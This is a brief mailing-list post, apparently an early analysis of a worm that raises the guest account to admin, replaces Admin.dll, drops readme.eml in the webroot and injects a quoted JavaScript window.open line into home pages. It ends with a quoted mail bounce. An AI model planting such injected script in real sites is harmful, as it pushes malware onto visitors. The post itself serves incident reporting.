this looks like the result of a new worm said to be propogating. early analysis has the worm giving admin permissions to guest account of infected host, replacing Admin.dll with infected code (via ftp?), placing the file readme.eml in the webroot, and adding the following line of script to the home page. language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000") this looks like it may be the first wild exploit of this vulnerability: http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/bulletin/ms01-020.asp --rt MAILER-DAEMON at welly-4.star.net.uk wrote: > Hi. This is the qmail-send program at welly-4.star.net.uk. > I'm afraid I wasn't able to deliver your message to the following addresses. > This is a permanent error; I've given up. Sorry it didn't work out.